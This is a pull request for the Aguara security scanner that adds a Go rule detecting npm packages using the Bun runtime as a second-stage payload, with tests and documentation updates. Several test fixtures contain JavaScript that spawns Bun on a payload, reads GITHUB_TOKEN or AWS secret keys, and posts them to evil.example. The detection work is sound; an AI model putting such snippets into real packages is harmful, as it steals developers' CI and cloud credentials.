### PR TITLE
Detect Bun used as a malicious second stage

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -4,7 +4,7 @@ This file provides guidance to Claude Code (claude.ai/code) when working with co
 
 ## Project Status
 
-Aguara v0.22.0 (2026-05-29). 193 YAML rules + 29 analyzer-emitted (222 cataloged), 13 categories, 9 scan analyzers (pattern, ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxicflow, rugpull) plus the `aguara check` incident command (npm/PyPI installed trees + pre-install npm lockfiles pnpm-lock.yaml / package-lock.json / yarn.lock classic, and Go/Rust/PHP/Ruby/Java/.NET lockfiles), 0 lint issues.
+Aguara v0.22.0 (2026-05-29). 193 YAML rules + 30 analyzer-emitted (223 cataloged), 13 categories, 9 scan analyzers (pattern, ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxicflow, rugpull) plus the `aguara check` incident command (npm/PyPI installed trees + pre-install npm lockfiles pnpm-lock.yaml / package-lock.json / yarn.lock classic, and Go/Rust/PHP/Ruby/Java/.NET lockfiles), 0 lint issues.
 
 Distribution: install.sh (mandatory checksum verification, bounded curl + retry), Homebrew tap, Docker (GHCR, multi-arch `linux/amd64+arm64`, runs as non-root UID 10001, base images digest-pinned, signed at digest with Cosign + SBOM + SLSA provenance attestations), GoReleaser (releases signed via Cosign keyless, SPDX SBOM per archive, `-trimpath` for reproducibility), GitHub Action, go install.
 
@@ -148,7 +148,7 @@ When completing a product task (fixing a bug, adding a feature, releasing a vers
 ### Data consistency rule
 
 When any of these values change, update ALL references across the vault:
-- Rule count (currently 193 YAML / 222 cataloged)
+- Rule count (currently 193 YAML / 223 cataloged)
 - Test count (currently ~750)
 - Coverage (currently 80%)
 - Star/fork count (currently 48/6)

--- a/README.md
+++ b/README.md
@@ -525,10 +525,10 @@ Supported directives:
 
 ## Rules
 
-Aguara currently exposes **222 cataloged detections** through `aguara list-rules`:
+Aguara currently exposes **223 cataloged detections** through `aguara list-rules`:
 
 - **193 embedded YAML pattern rules** across 13 categories
-- **29 analyzer-emitted detections** from ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxic-flow, and rug-pull
+- **30 analyzer-emitted detections** from ci-trust, pkgmeta, jsrisk, pyrisk, rsbuild, NLP, toxic-flow, and rug-pull
 
 The table groups coverage by emit-time category for readability:
 

--- a/aguara_test.go
+++ b/aguara_test.go
@@ -251,6 +251,15 @@ subprocess.run(["node", "-e", payload])
 			content:  `{"name":"x","version":"1.0.0","scripts":{"preinstall":"node index.js"}}`,
 		},
 		{
+			name:     "jsrisk Bun second stage through public API",
+			filename: "index.js",
+			ruleID:   "JS_BUN_SECOND_STAGE_001",
+			content: `const cp = require('child_process');
+cp.spawn('bun', ['run', './stage.mjs']);
+const t = process.env.GITHUB_TOKEN;
+fetch('https://evil.example/c', { method: 'POST', body: t });`,
+		},
+		{
 			name:     "rsbuild wallet read -> network through public API",
 			filename: "build.rs",
 			ruleID:   "RS_BUILD_WALLET_EXFIL_001",

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -44,12 +44,13 @@ const AnalyzerName = "jsrisk"
 
 // Rule IDs emitted by this analyzer.
 const (
-	RuleObfuscation       = "JS_OBF_001"
-	RuleDaemon            = "JS_DAEMON_001"
-	RuleCISecretHarvest   = "JS_CI_SECRET_HARVEST_001"
-	RuleProcMemOIDC       = "JS_PROC_MEM_OIDC_001"
-	RuleAgentPersistence  = "AGENT_PERSISTENCE_001"
-	RuleDNSTXTExfil       = "JS_DNS_TXT_EXFIL_001"
+	RuleObfuscation      = "JS_OBF_001"
+	RuleDaemon           = "JS_DAEMON_001"
+	RuleCISecretHarvest  = "JS_CI_SECRET_HARVEST_001"
+	RuleProcMemOIDC      = "JS_PROC_MEM_OIDC_001"
+	RuleAgentPersistence = "AGENT_PERSISTENCE_001"
+	RuleDNSTXTExfil      = "JS_DNS_TXT_EXFIL_001"
+	RuleBunSecondStage   = "JS_BUN_SECOND_STAGE_001"
 )
 
 // Detection thresholds. Chosen to leave room for ordinary minified
@@ -135,7 +136,6 @@ var detachedTrueRe = regexp.MustCompile(`(?i)` + propertyBoundary + `["']?detach
 // `"stdio": ['ignore'`) at a property boundary.
 var stdioIgnoredRe = regexp.MustCompile(`(?i)` + propertyBoundary + `["']?stdio["']?\s*:\s*(?:['"]ignore['"]|\[\s*['"]ignore['"])`)
 
-
 // --- metrics ---
 
 // metrics holds the once-computed signals for the current file. Line
@@ -190,6 +190,15 @@ type metrics struct {
 	// straight to CRITICAL.
 	HasNodeIPCIOC bool
 	NodeIPCMatch  string
+
+	// Bun second-stage chain (JS_BUN_SECOND_STAGE_001). HasBunExecution
+	// is true when the file runs the Bun runtime through a bound
+	// child_process / execa / shelljs call. Execution alone never fires; a
+	// strong partner (obfuscator shape, CI/cloud secret read, or a
+	// network-call sink) is required, so the partner cannot be faked by a
+	// documentation string.
+	HasBunExecution bool
+	LineBun         int
 }
 
 // computeMetrics walks the content once, tracking line numbers and
@@ -286,6 +295,15 @@ func computeMetrics(content []byte) *metrics {
 	// child_process. Used by JS_OBF_001 severity escalation only.
 	m.HasChildProcess = hasChildProcessInvocation(content)
 	m.HasProcessEnv = bytes.Contains(lower, []byte("process.env"))
+
+	// Bun execution: a bound child_process / execa / shelljs call running
+	// bun, detected on COMMENT-STRIPPED code so a documented command is
+	// never mistaken for a launch. The gate (detectBunSecondStage) pairs
+	// this with a strong partner; execution alone never fires.
+	if line := bunExecutionSite(stripJSCommentsPreservingOffsets(content)); line > 0 {
+		m.HasBunExecution = true
+		m.LineBun = line
+	}
 
 	// CI / cloud secret reads come in three forms: direct member access
 	// (process.env.NAME), bracket access (process.env['NAME']), and
@@ -525,6 +543,82 @@ func hasChildProcessInvocation(content []byte) bool {
 	return len(collectChildProcessCalls(content)) > 0
 }
 
+// bunExecutionSite returns the 1-based line of the first REAL Bun runtime
+// launch in already-comment-stripped code, or 0. Execution is recognized
+// only at bound call sites: a child_process call (spawn/exec/execFile/fork
+// via collectChildProcessCalls) whose args run bun, an execa(...) call
+// running bun, or a shelljs `.exec(...)` running a bun command in a file
+// that imports shelljs. An unrelated `db.exec('bun run x')`, a
+// user-defined helper named exec/spawn, and documented commands therefore
+// do not register. Call-site starts inside a string literal are skipped
+// (a stringified example is not a call).
+func bunExecutionSite(code []byte) int {
+	strs := jsStringInteriors(code)
+	inString := func(i int) bool {
+		for _, r := range strs {
+			if r[0] > i {
+				break
+			}
+			if i >= r[0] && i < r[1] {
+				return true
+			}
+		}
+		return false
+	}
+	best := -1
+	consider := func(start int) {
+		if start < 0 || inString(start) {
+			return
+		}
+		if best < 0 || start < best {
+			best = start
+		}
+	}
+
+	// Real child_process calls whose arguments launch bun on a payload:
+	// the program-literal form spawn("bun", ["./x.mjs"]) and the
+	// command-string form exec("bun run ./x"). Bound via
+	// collectChildProcessCalls (receiver alias or destructured), so a
+	// user-defined function named spawn/exec does not count.
+	for _, site := range collectChildProcessCalls(code) {
+		if callRunsBun(code[site.Start:site.ArgsStart], extractCallArgs(code, site.ArgsStart)) {
+			consider(site.Start)
+		}
+	}
+	// execa('bun', ['./x.mjs']) / execaCommand('bun run ./x').
+	for _, loc := range execaCallRe.FindAllIndex(code, -1) {
+		if callRunsBun(code[loc[0]:loc[1]], extractCallArgs(code, loc[1])) {
+			consider(loc[0])
+		}
+	}
+	// shelljs .exec("bun run ..."), bound to a real shelljs receiver: an
+	// inline require('shelljs').exec(...) or an alias bound to shelljs.
+	for _, loc := range shelljsInlineExecRe.FindAllIndex(code, -1) {
+		if bunCommandStrRe.Match(extractCallArgs(code, loc[1])) {
+			consider(loc[0])
+		}
+	}
+	shelljsAliases := map[string]bool{}
+	for _, mm := range shelljsAliasAssignRe.FindAllSubmatchIndex(code, -1) {
+		shelljsAliases[string(code[mm[2]:mm[3]])] = true
+	}
+	for _, mm := range shelljsAliasESMRe.FindAllSubmatchIndex(code, -1) {
+		shelljsAliases[string(code[mm[2]:mm[3]])] = true
+	}
+	if len(shelljsAliases) > 0 {
+		for _, mm := range aliasExecCallRe.FindAllSubmatchIndex(code, -1) {
+			if shelljsAliases[string(code[mm[2]:mm[3]])] &&
+				bunCommandStrRe.Match(extractCallArgs(code, mm[1])) {
+				consider(mm[0])
+			}
+		}
+	}
+	if best < 0 {
+		return 0
+	}
+	return lineOf(code, best)
+}
+
 // findNetworkAliasSink walks imports of http/https/net and reports
 // the line of the first <alias>.<method>(...) call against any of
 // the imported aliases. The alias set is built from real require/
@@ -641,8 +735,13 @@ var inlineRequireReceiverRe = regexp.MustCompile(
 //	let _cp = require("node:child_process")
 //
 // Submatch 1 is the local name.
+// childProcessAliasAssignRe binds a local name to child_process. It
+// accepts both the leading-declarator form (`const cp = require(...)`) and
+// a declarator-continuation / sequence form (`const fs = ..., cp =
+// require(...)`), so a multi-declarator const still binds the alias. The
+// `= require('child_process')` tail keeps it from matching anything else.
 var childProcessAliasAssignRe = regexp.MustCompile(
-	`(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"](?:node:)?child_process['"]\s*\)`,
+	`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"](?:node:)?child_process['"]\s*\)`,
 )
 
 // childProcessAliasESMRe captures the local variable bound via an
@@ -685,8 +784,8 @@ var childProcessESMDestructureRe = regexp.MustCompile(
 // these names.
 var cpMethodNames = map[string]bool{
 	"spawn": true, "spawnSync": true,
-	"fork":    true,
-	"exec":    true, "execSync": true,
+	"fork": true,
+	"exec": true, "execSync": true,
 	"execFile": true, "execFileSync": true,
 }
 
@@ -734,9 +833,8 @@ const jsIdentBoundary = `(?:^|[^A-Za-z0-9_$.])`
 // take the substring before `:` (if present) as the source name.
 var envDestructureRe = regexp.MustCompile(`\{\s*([^}]+?)\s*\}\s*=\s*process\.env\b`)
 
-
 // procMemDynamicSubRe matches the quote-wrapped subpath token used by
-// dynamic forms: `'/mem'`, `"/maps"`, `` `/cmdline` ``, and the
+// dynamic forms: `'/mem'`, `"/maps"`, “ `/cmdline` “, and the
 // template-interpolation closing form `}/mem`. The leading set
 // includes `}` so template literals (`/proc/${pid}/mem`) match.
 var procMemDynamicSubRe = regexp.MustCompile("[}'\"\x60]/(mem|maps|cmdline)['\"\x60}]")
@@ -816,7 +914,6 @@ var httpModuleAliasESMRe = regexp.MustCompile(
 	`import\s+(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"](?:node:)?(?:http|https|net)['"]`,
 )
 
-
 var publishSinkNeedles = []string{
 	"registry.npmjs.org",
 	"/-/npm/v1/tokens",
@@ -834,6 +931,71 @@ var sessionSinkNeedles = []string{
 	"seed2.getsession.org",
 	"seed3.getsession.org",
 }
+
+// A Bun launch only counts as a second stage when it runs a local PAYLOAD:
+// a path, a .js/.cjs/.mjs file, or an inline -e/--eval. Bare subcommands --
+// `bun test`, `bun --version`, `bun run build` (a package script name, no
+// path) -- are ordinary project usage and must not register, per the spec.
+//
+//   - bunProgramRe: first argument is the literal "bun" program
+//     (spawn("bun", ...)). Anchored with ^ so a quoted "bun" appearing
+//     only as DATA (spawn("echo", ["bun"])) does not match.
+//   - bunPayloadTargetRe: a quoted path / .js file, or a -e/--eval flag,
+//     anywhere in the args -- the suspicious target a bun program runs.
+//   - bunCommandStrRe: the single-string command form bun [run] <path|.js>
+//     or bun -e/--eval, used for exec("bun ...") and shelljs .exec(...).
+var (
+	bunProgramRe       = regexp.MustCompile(`(?i)^\s*['"` + "`" + `]bun['"` + "`" + `]`)
+	bunPayloadTargetRe = regexp.MustCompile(`(?i)['"` + "`" + `](?:\.{0,2}/[^\s'"` + "`" + `]+|[a-z0-9_.@/-]*\.[cm]?js)['"` + "`" + `]|['"` + "`" + `]--eval['"` + "`" + `]|['"` + "`" + `]-e['"` + "`" + `]`)
+	bunCommandStrRe    = regexp.MustCompile(`(?i)\bbun\s+(?:(?:run\s+)?(?:\.{0,2}/[^\s'"` + "`" + `]+|[a-z0-9_.@/-]*\.[cm]?js\b)|--eval\b|-e\b)`)
+)
+
+// cpMethodAtEndRe captures the method identifier immediately before the
+// opening paren of a call (the last name in a `cp.spawn(` /
+// `require('child_process').exec(` / `execa(` prefix).
+var cpMethodAtEndRe = regexp.MustCompile(`([A-Za-z]+)\s*\(\s*$`)
+
+// bunShellMethods are the process APIs that take a whole shell COMMAND as
+// one string argument; for these, a `bun run ./x` anywhere in the command
+// string is a launch. Every other API (spawn / spawnSync / execFile /
+// execFileSync / fork / execa) takes the program as its FIRST argument and
+// the rest as data, so `bun` must be that first program argument.
+var bunShellMethods = map[string]bool{
+	"exec": true, "execsync": true,
+	"execacommand": true, "execacommandsync": true,
+}
+
+// callRunsBun reports whether a process call launches Bun on a local
+// payload. `prefix` is the call text up to and including the opening paren
+// (used to recover the method); `args` is the argument list. Shell-command
+// APIs match a bun command string; program APIs require "bun" as the first
+// program argument plus a payload target, so `spawn("echo", ["bun run x"])`
+// (bun only as data) does not match.
+func callRunsBun(prefix, args []byte) bool {
+	method := ""
+	if mm := cpMethodAtEndRe.FindSubmatch(prefix); mm != nil {
+		method = strings.ToLower(string(mm[1]))
+	}
+	if bunShellMethods[method] {
+		return bunCommandStrRe.Match(args)
+	}
+	return bunProgramRe.Match(args) && bunPayloadTargetRe.Match(args)
+}
+
+// execa is an unambiguous library name, so an execa(...) call is a real
+// process launch.
+var execaCallRe = regexp.MustCompile(`(?i)\bexeca(?:sync|command|commandsync)?\s*\(`)
+
+// shelljs binding. `.exec(...)` is only a shell launch when its receiver
+// is a name bound to shelljs (or an inline require('shelljs').exec(...)),
+// so an unrelated `db.exec('bun run x')` in a shelljs-importing file is
+// NOT treated as a shell command. Mirrors the child_process alias logic.
+var (
+	shelljsAliasAssignRe = regexp.MustCompile(`(?:(?:const|let|var)\s+|,\s*)([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"` + "`" + `]shelljs['"` + "`" + `]\s*\)`)
+	shelljsAliasESMRe    = regexp.MustCompile(`import\s+(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"` + "`" + `]shelljs['"` + "`" + `]`)
+	shelljsInlineExecRe  = regexp.MustCompile(`(?i)require\s*\(\s*['"` + "`" + `]shelljs['"` + "`" + `]\s*\)\s*\.\s*exec\s*\(`)
+	aliasExecCallRe      = regexp.MustCompile(`\b([A-Za-z_$][\w$]*)\s*\.\s*exec\s*\(`)
+)
 
 // ciSecretEnvVars are GHA / cloud env var names whose value is the
 // secret. A real read goes through process.env (see envReadRe); the
@@ -1362,12 +1524,12 @@ var fsWriteBareCallRe = regexp.MustCompile(
 // fsWriteMethodNames is the canonical list of fs write method names
 // accepted as staging anchors. Kept in sync with the regexes above.
 var fsWriteMethodNames = map[string]bool{
-	"writeFile":     true,
-	"writeFileSync": true,
-	"appendFile":    true,
+	"writeFile":      true,
+	"writeFileSync":  true,
+	"appendFile":     true,
 	"appendFileSync": true,
-	"writeSync":     true,
-	"outputFile":    true,
+	"writeSync":      true,
+	"outputFile":     true,
 	"outputFileSync": true,
 }
 
@@ -1411,8 +1573,10 @@ var osModuleAliasESMRe = regexp.MustCompile(
 
 // osModuleAliasESMCombinedRe captures the DEFAULT alias in
 // combined ESM imports of the os module:
-//   import os, { platform } from 'os'
-//   import os, * as osNs from 'os'
+//
+//	import os, { platform } from 'os'
+//	import os, * as osNs from 'os'
+//
 // Submatch 1 is the default identifier. The trailing clause is
 // captured separately by osModuleAliasESMRe and osDestructureESMRe.
 var osModuleAliasESMCombinedRe = regexp.MustCompile(
@@ -1438,7 +1602,8 @@ var fsModuleAliasESMRe = regexp.MustCompile(
 
 // fsModuleAliasESMCombinedRe captures the DEFAULT alias in combined
 // ESM imports of the fs / fs-extra / fs/promises modules:
-//   import fs, { writeFileSync } from 'fs'
+//
+//	import fs, { writeFileSync } from 'fs'
 var fsModuleAliasESMCombinedRe = regexp.MustCompile(
 	`import\s+([A-Za-z_$][\w$]*)\s*,\s*(?:\*\s+as\s+[A-Za-z_$][\w$]*|\{[^}]+\})\s+from\s*['"](?:node:)?(?:fs|fs-extra|fs/promises)['"]`,
 )
@@ -1613,7 +1778,83 @@ func detect(path string, m *metrics, content []byte) []types.Finding {
 	if f := detectDNSTXTExfil(path, m, content); f != nil {
 		out = append(out, *f)
 	}
+	if f := detectBunSecondStage(path, m); f != nil {
+		out = append(out, *f)
+	}
 	return out
+}
+
+// hasObfuscatorShape reports whether the file carries an
+// obfuscator-specific signal (hex identifier density, dispatcher-call
+// density, or a while(!![]) loop). It mirrors the obfuscator-specific
+// half of detectObfuscation's gate and is used as a Bun second-stage
+// partner. JS_OBF_001 may also fire independently; the two findings are
+// complementary (one names the runtime, one the payload shape).
+func (m *metrics) hasObfuscatorShape() bool {
+	return m.HexIdentifierCount > hexIdentifierThreshold ||
+		m.DispatcherCallCount > dispatcherCallThreshold ||
+		m.HasWhileTruePattern
+}
+
+// detectBunSecondStage emits JS_BUN_SECOND_STAGE_001 when a file uses the
+// Bun runtime as a second stage. Bun execution ALONE never fires (that
+// would flag ordinary Bun projects); a partner signal is required:
+// Bun download, obfuscator shape, a CI/cloud secret read, an exfil sink,
+// or a staged-payload write. Severity is HIGH for the chain, CRITICAL
+// when a CI/cloud secret read AND an exfil sink are both present (the
+// credential-theft-via-Bun-loader shape). Informational partners like a
+// bare process.env read are deliberately NOT sufficient: ordinary Bun
+// apps read env vars, so the credential partner is the CI/cloud-specific
+// secret signal only.
+func detectBunSecondStage(path string, m *metrics) *types.Finding {
+	if !m.HasBunExecution {
+		return nil
+	}
+	// Require a STRONG partner: a structural / call-bound signal, not a
+	// string-presence one. Obfuscator shape is structural; the CI/cloud
+	// secret read is bound to a real process.env.SECRET access; the
+	// network sink is bound to a fetch()/http.request() call. String-only
+	// signals (a download URL, a chmod/writeFileSync mention, a registry
+	// host) are deliberately NOT sufficient on their own: separating a
+	// documented mention from a real one needs data-flow we do not do, so
+	// the gate stays on the signals that cannot be faked by a doc string.
+	strongPartner := m.hasObfuscatorShape() || m.HasCISecretRead || m.HasNetworkSink
+	if !strongPartner {
+		return nil
+	}
+	// CRITICAL is the credential-theft-via-Bun-loader shape: a real secret
+	// read AND an exfil sink. The secret read is the strong anchor, so the
+	// (weaker, needle-based) publish / GitHub / session hosts are accepted
+	// here only as the sink half alongside it.
+	sink := m.HasNetworkSink || m.HasPublishSink || m.HasGitHubGraphQLSink || m.HasSessionSink
+	sev := types.SeverityHigh
+	if m.HasCISecretRead && sink {
+		sev = types.SeverityCritical
+	}
+	line := m.LineBun
+	if line == 0 {
+		line = 1
+	}
+	return &types.Finding{
+		RuleID:   RuleBunSecondStage,
+		RuleName: "Bun second-stage execution",
+		Severity: sev,
+		Category: "supply-chain",
+		Description: "JavaScript runs the Bun runtime as a second stage alongside a " +
+			"supply-chain signal: an obfuscator-shape payload, a CI/cloud secret read, or a " +
+			"network exfil sink. The Red Hat/Miasma worm used a Node preinstall hook to " +
+			"download a pinned Bun and execute its heavier second stage outside the Node " +
+			"runtime to dodge Node-focused monitoring.",
+		FilePath:    path,
+		Line:        line,
+		MatchedText: "bun runtime execution + supply-chain partner signal",
+		Analyzer:    AnalyzerName,
+		Confidence:  0.85,
+		Remediation: "A package that shells out to Bun during install is almost never " +
+			"legitimate. Inspect the file in a clean clone, identify what the Bun stage " +
+			"executes, rotate any credentials reachable from the environment it ran in, and " +
+			"pin the dependency to a reviewed version (install with --ignore-scripts).",
+	}
 }
 
 // jsStringInteriors returns sorted, non-overlapping byte ranges

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -2440,3 +2440,223 @@ if (m.includes(process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN)) {}
 		seenLines[f.Line] = f.RuleID
 	}
 }
+
+// TestBunSecondStage covers JS_BUN_SECOND_STAGE_001: Bun used as a
+// suspicious second stage. Execution alone never fires; a partner signal
+// (download, obfuscation, CI secret read, exfil sink, staged write) is
+// required, and a CI secret read + exfil sink escalates to CRITICAL.
+func TestBunSecondStage(t *testing.T) {
+	cases := []struct {
+		name    string
+		content string
+		want    bool
+		crit    bool // when want, assert CRITICAL (else HIGH)
+	}{
+		{
+			name: "spawn bun + obfuscator shape",
+			content: `const cp = require('child_process');
+while(!![]){ var _0xabc = 1; }
+cp.spawn('bun', ['./stage.mjs']);`,
+			want: true,
+		},
+		{
+			name: "bun exec + GITHUB_TOKEN read + network sink -> CRITICAL",
+			content: `const cp = require('child_process');
+cp.spawn('bun', ['./x.mjs']);
+const t = process.env.GITHUB_TOKEN;
+fetch('https://evil.example/c', { method: 'POST', body: t });`,
+			want: true,
+			crit: true,
+		},
+		{
+			// Multi-declarator alias (cp bound to child_process in a comma
+			// list) + a network sink. Proves the alias collector binds the
+			// multi-var form and the network-call partner is strong. Uses a
+			// literal payload target (a variable target is the documented
+			// precision tradeoff below).
+			name: "multi-var cp.spawn bun + network sink",
+			content: `const fs = require('fs'), os = require('os'), cp = require('child_process');
+cp.spawn('bun', ['./stage.mjs']);
+fetch('https://evil.example/c', { method: 'POST' });`,
+			want: true,
+		},
+		{
+			// Precision tradeoff: a bun launch whose payload is a VARIABLE
+			// (not a literal path/.js/-e) is not matched, so a benign
+			// `spawn('bun', [subcmd])` cannot be mistaken for a payload run.
+			// Recall cost: a malicious variable-target spawn is missed.
+			name: "spawn bun with variable target is not matched (precision tradeoff)",
+			content: `const cp = require('child_process');
+const p = computePath();
+cp.spawn('bun', [p]);
+fetch('https://evil.example/c', { method: 'POST' });`,
+			want: false,
+		},
+		{
+			name: "exec string form (bun run inside execSync) + network sink",
+			content: `const cp = require('child_process');
+cp.execSync('bun run ./stage.mjs');
+fetch('https://evil.example/c', { method: 'POST' });`,
+			want: true,
+		},
+		{
+			name: "shelljs alias exec bun run + secret + sink -> CRITICAL",
+			content: `const sh = require('shelljs');
+sh.exec('bun run ./stage.mjs');
+const t = process.env.AWS_SECRET_ACCESS_KEY;
+fetch('https://evil.example/c', { body: t });`,
+			want: true,
+			crit: true,
+		},
+		// --- false positives: Bun used legitimately, no partner ---
+		{
+			// A `bun run ...` command in a COMMENT is not execution, even
+			// alongside a real fetch() partner. Anchoring the string form to
+			// an exec wrapper keeps this quiet.
+			name: "bun run in a comment + fetch is not execution",
+			content: `// deploy step: bun run ./stage.mjs
+fetch('https://example.com/health');`,
+			want: false,
+		},
+		{
+			// A fully COMMENTED exec call must not count as execution even
+			// though it textually matches the exec-wrapper regex.
+			name: "commented-out execSync(bun run) + fetch is not execution",
+			content: `// cp.execSync('bun run ./stage.mjs');
+fetch('https://example.com/health');`,
+			want: false,
+		},
+		{
+			// A stringified example (the exec keyword itself inside a
+			// string) is documentation, not execution.
+			name: "stringified exec example + fetch is not execution",
+			content: `const usage = "cp.execSync('bun run ./stage.mjs')";
+fetch('https://example.com/health');`,
+			want: false,
+		},
+		{
+			name:    "bun test alone",
+			content: `require('child_process').spawn('bun', ['test']);`,
+			want:    false,
+		},
+		{
+			name:    "bun run build alone",
+			content: `require('child_process').spawn('bun', ['run', 'build']);`,
+			want:    false,
+		},
+		{
+			name: "doc string mentioning bun.sh, no execution",
+			content: `// To develop locally, install Bun from bun.sh first.
+module.exports = { name: 'lib' };`,
+			want: false,
+		},
+		{
+			name:    "bun --version probe",
+			content: `require('child_process').execSync('bun --version');`,
+			want:    false,
+		},
+		{
+			name:    "setup-bun reference in JS, no payload",
+			content: `const action = 'oven-sh/setup-bun'; // CI helper name only`,
+			want:    false,
+		},
+		{
+			// `.exec` on a non-child_process object (a DB handle) is not a
+			// process launch, even with a partner present.
+			name: "db.exec is not a process launch",
+			content: `const db = require('better-sqlite3')('x.db');
+db.exec('bun run migration.js');
+fetch('https://example.com/health');`,
+			want: false,
+		},
+		{
+			// "bun" as a DATA argument (not the program) is not execution.
+			name: "bun as data argument to echo is not execution",
+			content: `const cp = require('child_process');
+cp.spawn('echo', ['bun']);
+fetch('https://example.com/health');`,
+			want: false,
+		},
+		{
+			// A bun COMMAND STRING passed as data to a program API (echo is
+			// the program; "bun run ..." is just an argument) is not a Bun
+			// launch -- only exec/execSync take a whole shell command string.
+			name: "bun command string as data to echo spawn is not execution",
+			content: `const cp = require('child_process');
+cp.spawn('echo', ['bun run ./stage.mjs']);
+fetch('https://example.com/health');`,
+			want: false,
+		},
+		{
+			// A file that imports shelljs but runs bun via an UNRELATED
+			// .exec receiver (a DB handle) is not a shelljs launch.
+			name: "shelljs imported but db.exec runs bun string",
+			content: `const sh = require('shelljs');
+const db = require('better-sqlite3')('x.db');
+db.exec('bun run migration.js');
+fetch('https://example.com/health');`,
+			want: false,
+		},
+		{
+			// A user-defined helper named exec is not a child_process /
+			// execa / shelljs binding, so it does not count as execution.
+			name: "user-defined exec helper is not a process launch",
+			content: `function exec(s) { return s.length; }
+exec('bun run ./stage.mjs');
+fetch('https://example.com/health');`,
+			want: false,
+		},
+		{
+			// Program-literal form via a user-defined spawn: spawn('bun') is
+			// not a real process API unless spawn is bound to child_process.
+			name: "user-defined spawn helper with 'bun' arg is not a launch",
+			content: `function spawn(p) { return p; }
+spawn('bun');
+fetch('https://example.com/health');`,
+			want: false,
+		},
+		{
+			// Destructured child_process spawn IS a real launch (TP), to
+			// prove the bound path catches the program-literal form. Paired
+			// with an obfuscator-shape payload (strong partner).
+			name: "destructured child_process spawn bun + obfuscation",
+			content: `const { spawn } = require('child_process');
+while(!![]){ var _0xabc = 1; }
+spawn('bun', ['./stage.mjs']);`,
+			want: true,
+		},
+		{
+			// Accepted tradeoff (stop-rule): Bun execution + a download URL
+			// or chmod/writeFileSync that appears ONLY as a string/doc, with
+			// no strong partner, does not fire. These string-presence
+			// signals were dropped as standalone partners.
+			name: "bun run build + download URL only in a string is not a finding",
+			content: `const cp = require('child_process');
+cp.spawn('bun', ['run', 'build']);
+console.error('Install Bun from https://bun.sh/install');`,
+			want: false,
+		},
+		{
+			name: "bun exec + chmod/writeFileSync only in a doc string is not a finding",
+			content: `const cp = require('child_process');
+cp.spawn('bun', ['run', './stage.mjs']);
+const help = 'chmod after fs.writeFileSync to stage the bundle';`,
+			want: false,
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			findings := analyze(t, "index.js", c.content)
+			got := hasRule(findings, RuleBunSecondStage)
+			if got != c.want {
+				t.Fatalf("JS_BUN_SECOND_STAGE_001 present = %v, want %v (findings: %+v)", got, c.want, findings)
+			}
+			if c.want && c.crit {
+				f := findRule(findings, RuleBunSecondStage)
+				if f == nil || f.Severity != types.SeverityCritical {
+					t.Errorf("expected CRITICAL, got %+v", f)
+				}
+			}
+		})
+	}
+}

--- a/internal/engine/jsrisk/metadata.go
+++ b/internal/engine/jsrisk/metadata.go
@@ -101,5 +101,26 @@ func RuleMetadata() []rulemeta.Rule {
 				"package, audit recent installs, and rotate every credential the host " +
 				"could reach.",
 		},
+		{
+			ID:       RuleBunSecondStage,
+			Name:     "Bun second-stage execution",
+			Severity: "HIGH",
+			Category: "supply-chain",
+			Analyzer: rulemeta.AnalyzerJSRisk,
+			Description: "JavaScript runs the Bun runtime as a second stage and pairs it with " +
+				"a strong supply-chain signal: an obfuscator-shape payload, a CI/cloud secret " +
+				"read, or a network exfil sink. Bun execution is detected only at a bound " +
+				"child_process / execa / shelljs call (not a comment, string, or unrelated " +
+				"method), and the partner must be a structural / call-bound signal, so a " +
+				"documented command or URL cannot trigger it. The Red Hat/Miasma worm used a " +
+				"Node preinstall hook to download a pinned Bun and run its heavier stage " +
+				"outside Node to evade Node-focused monitoring. Bun execution alone never " +
+				"fires (ordinary projects use Bun); CRITICAL when a CI/cloud secret read AND " +
+				"an exfil sink are both present.",
+			Remediation: "A package that downloads or shells out to Bun during install is " +
+				"almost never legitimate. Inspect the file in a clean clone, identify what the " +
+				"Bun stage executes, rotate any credentials reachable from its environment, and " +
+				"pin the dependency to a reviewed version (install with --ignore-scripts).",
+		},
 	}
 }


### PR DESCRIPTION
## What

Some npm supply-chain attacks, including the Red Hat/Miasma worm, start with an install hook that runs local JavaScript, then move into a heavier second stage under the Bun runtime to slip past Node-focused monitoring. `SUPPLY_026` already flags the first hop; this adds detection for the Bun second stage.

Aguara now reports JavaScript that launches Bun on a local payload when the file also shows signs of credential access, obfuscation, or network exfiltration.

## What it flags

A file that runs Bun on a local payload, such as `spawn('bun', ['./stage.mjs'])`, `execSync('bun run ./x')`, or `execa('bun', ['-e', ...])`, together with at least one of:

- an obfuscated payload
- a CI/cloud secret read (`GITHUB_TOKEN`, AWS keys, ...)
- a network exfil sink

CRITICAL when the same file includes both secret access and an exfil sink.

## What stays quiet

- Ordinary Bun usage: `bun test`, `bun run build`, `bun --version`.
- Bun mentioned in comments, docs, or strings.
- `bun` passed as data to another command, `.exec` on a database handle, or a user-defined helper named `spawn`/`exec`.
- Bun execution on its own, with no supply-chain signal.

## Notes

The Bun execution trigger is bound to a real child_process, execa, or shelljs call. The supporting supply-chain signals use Aguara's shared jsrisk signal layer; making that layer comment/string-aware across all jsrisk rules is a separate follow-up.

## Validation

- `make build && make test && make vet && make lint`
